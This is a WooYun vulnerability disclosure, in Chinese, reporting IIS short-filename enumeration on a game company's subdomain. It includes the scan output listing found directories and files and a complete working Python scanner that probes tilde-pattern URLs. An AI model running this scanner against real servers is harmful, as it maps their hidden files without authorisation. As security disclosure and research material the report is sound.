当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155652

漏洞标题:联众世界某站短文件名泄漏

相关厂商:联众世界

漏洞作者: 路人甲

提交时间:2015-11-25 10:08

修复时间:2015-11-25 10:46

公开时间:2015-11-25 10:46

漏洞类型:敏感信息泄露

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

.............

详细说明:

漏洞地址:http://subject.ourgame.com/,这个二级域名会跳转到主站!
这个漏洞其实没有什么,全靠猜
这个漏洞可以导致DOS,这个不敢测试,怕影响网站的正常运营
参考其他的漏洞利用案例:
WooYun: 完美时空某分站短文件名泄露
WooYun: 阳光雨露主站IIS短文件名泄露并成功登录主站后台

漏洞证明:

C:\Users\Administrator\Desktop\IIS_shortname_Scanner-master>python iis_shortname_Scan.py http://subject.ourgame.com/
server is vulerable, please wait, scanning...
Found /i****    [scan in progress]
Found /g****    [scan in progress]
Found /e****    [scan in progress]
Found /a****    [scan in progress]
Found /c****    [scan in progress]
Found /j****    [scan in progress]
Found /s****    [scan in progress]
Found /t****    [scan in progress]
Found /w****    [scan in progress]
Found /z****    [scan in progress]
Found /in****   [scan in progress]
Found /ge****   [scan in progress]
Found /er****   [scan in progress]
Found /as****   [scan in progress]
Found /cr****   [scan in progress]
Found /ju****   [scan in progress]
Found /sr****   [scan in progress]
Found /su****   [scan in progress]
Found /th****   [scan in progress]
Found /we****   [scan in progress]
Found /zi****   [scan in progress]
Found /ind****  [scan in progress]
Found /get****  [scan in progress]
Found /err****  [scan in progress]
Found /asp****  [scan in progress]
Found /cro****  [scan in progress]
Found /jun****  [scan in progress]
Found /srv****  [scan in progress]
Found /sum****  [scan in progress]
Found /thi****  [scan in progress]
Found /web****  [scan in progress]
Found /zib****  [scan in progress]
Found /inde**** [scan in progress]
Found /geto**** [scan in progress]
Found /erro**** [scan in progress]
Found /aspn**** [scan in progress]
Found /cros**** [scan in progress]
Found /junq**** [scan in progress]
Found /srvc**** [scan in progress]
Found /summ**** [scan in progress]
Found /thir**** [scan in progress]
Found /weba**** [scan in progress]
Found /zibe**** [scan in progress]
Found /index****        [scan in progress]
Found /geton****        [scan in progress]
Found /error****        [scan in progress]
Found /aspne****        [scan in progress]
Found /cross****        [scan in progress]
Found /junqi****        [scan in progress]
Found /srvce****        [scan in progress]
Found /summe****        [scan in progress]
Found /third****        [scan in progress]
Found /webac****        [scan in progress]
Found /zibei****        [scan in progress]
Found /index_****       [scan in progress]
Found /getonl****       [scan in progress]
Found /aspnet****       [scan in progress]
Found /crossd****       [scan in progress]
Found /junqim****       [scan in progress]
Found /srvcen****       [scan in progress]
Found /summer****       [scan in progress]
Found /thirdu****       [scan in progress]
Found /webact****       [scan in progress]
Found /zibei2****       [scan in progress]
Found /zibei3****       [scan in progress]
Found /index_*c**       [scan in progress]
Found /index_*s**       [scan in progress]
Found /getonl   [scan in progress]
Found Dir /getonl~1     [Done]
Found /aspnet   [scan in progress]
Found Dir /aspnet~1     [Done]
Found /crossd*m**       [scan in progress]
Found /crossd*l**       [scan in progress]
Found /crossd*x**       [scan in progress]
Found /junqim   [scan in progress]
Found Dir /junqim~1     [Done]
Found /srvcen   [scan in progress]
Found Dir /srvcen~1     [Done]
Found /summer   [scan in progress]
Found Dir /summer~1     [Done]
Found /thirdu   [scan in progress]
Found Dir /thirdu~1     [Done]
Found /webact   [scan in progress]
Found Dir /webact~1     [Done]
Found /zibei2*h**       [scan in progress]
Found /zibei2*m**       [scan in progress]
Found /zibei2*t**       [scan in progress]
Found /zibei3*h**       [scan in progress]
Found /zibei3*m**       [scan in progress]
Found /zibei3*t**       [scan in progress]
Found /index_*cs*       [scan in progress]
Found /index_*ss*       [scan in progress]
Found /crossd*ml*       [scan in progress]
Found /crossd*xm*       [scan in progress]
Found /zibei2*ht*       [scan in progress]
Found /zibei2*tm*       [scan in progress]
Found /zibei3*ht*       [scan in progress]
Found /zibei3*tm*       [scan in progress]
Found /index_*css       [scan in progress]
Found File /index_~1.css        [Done]
Found /crossd*xml       [scan in progress]
Found File /crossd~1.xml        [Done]
Found /zibei2*htm       [scan in progress]
Found File /zibei2~1.htm        [Done]
Found /zibei3*htm       [scan in progress]
Found File /zibei3~1.htm        [Done]
----------------------------------------------------------------
Dir:  /getonl~1
Dir:  /aspnet~1
Dir:  /junqim~1
Dir:  /srvcen~1
Dir:  /summer~1
Dir:  /thirdu~1
Dir:  /webact~1
File: /index_~1.css
File: /crossd~1.xml
File: /zibei2~1.htm
File: /zibei3~1.htm
----------------------------------------------------------------
7 Directories, 4 Files found in toal


1.jpg


不存在文件:

2.jpg


存在文件:

3.jpg


检测payload 想要获取全名可以加字典规则:

import sys
import httplib
import urlparse
import string
import threading
import Queue
import time
import string
class Scanner():
    def __init__(self, target):
        self.target = target
        self.scheme, self.netloc, self.path, params, query, fragment = \
                     urlparse.urlparse(target)
        if self.path[-1:] != '/':    # ends with slash
            self.path += '/'
        self.payloads = list('abcdefghijklmnopqrstuvwxyz0123456789_-')
        self.files = []
        self.dirs = []
        self.queue = Queue.Queue()
        self.lock = threading.Lock()
        self.threads = []
    
    def _conn(self):
        try:
            if self.scheme == 'https':
                conn = httplib.HTTPSConnection(self.netloc)
            else:
                conn = httplib.HTTPConnection(self.netloc)
            return conn
        except Exception, e:
            print '[Exception in function _conn]', e
            return None
    # fetch http response status code
    def _get_status(self, path):
        try:
            conn = self._conn()
            conn.request('GET', path)
            status = conn.getresponse().status
            conn.close()
            return status
        except Exception, e:
            raise Exception('[Exception in function _get_status] %s' % str(e) )
    # test weather the server is vulerable
    def is_vul(self):
        try:
            status_1 = self._get_status(self.path + '/*~1****/a.aspx')    # an existed file/folder
            status_2 = self._get_status(self.path + '/l1j1e*~1****/a.aspx')    # not existed file/folder
            if status_1 == 404 and status_2 == 400:
                return True
            return False
        except Exception, e:
            raise Exception('[Exception in function is_val] %s' % str(e) )
    def run(self):
        # start from root path
        for payload in self.payloads:
            self.queue.put( (self.path + payload, '****') )    # filename, extention
        for i in range(10):  
            t = threading.Thread(target=self._scan_worker)
            self.threads.append(t)
            t.start()
    def report(self):
        for t in self.threads:
            t.join()
        self._print('-'* 64)
        for d in self.dirs:
            self._print('Dir:  ' + d)
        for f in self.files:
            self._print('File: ' + f)
        self._print('-'*64)
        self._print('%d Directories, %d Files found in toal' % (len(self.dirs), len(self.files)) )
        
    def _print(self, msg):
        self.lock.acquire()
        print msg
        self.lock.release()
    def _scan_worker(self):
        while True:
            try:
                url, ext = self.queue.get(timeout=3)
                status = self._get_status(url + '*~1' + ext + '/1.aspx')
                if status == 404:
                    self._print('Found ' +  url + ext + '\t[scan in progress]')
                    if len(url) - len(self.path)< 6:    # enum first 6 chars only
                        for payload in self.payloads:
                            self.queue.put( (url + payload, ext) )
                    else:
                        if ext == '****':    # begin to scan extention
                            for payload in string.ascii_lowercase:
                                self.queue.put( (url, '*' + payload + '**') )
                            self.queue.put( (url,'') )    # also it can be a folder
                        elif ext.count('*') == 3:
                            for payload in string.ascii_lowercase:
                                self.queue.put( (url, '*' + ext[1] + payload + '*') )
                        elif ext.count('*') == 2:
                            for payload in string.ascii_lowercase:
                                self.queue.put( (url, '*' + ext[1] + ext[2] + payload ) )
                        elif ext == '':
                            self.dirs.append(url + '~1')
                            self._print('Found Dir ' +  url + '~1\t[Done]')
                        elif ext.count('*') == 1:
                            self.files.append(url + '~1.' + ext[1:])
                            self._print('Found File ' + url + '~1.' + ext[1:] + '\t[Done]')
            except Exception,e:
                break
            
if len(sys.argv) == 1:
    print 'Usage: %s target' % sys.argv[0]
    sys.exit()
target = sys.argv[1]
s = Scanner(target)
if not s.is_vul():
    print 'Sorry, server is not vulerable'
    sys.exit(0)
print 'server is vulerable, please wait, scanning...'
s.run()
s.report()


修复方案:

升级

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-25 10:46

厂商回复:

公司系统正在逐一升级,并且也没有其他的信息泄露。
感谢您对联众游戏的关注。

最新状态:

暂无

漏洞评价:

评价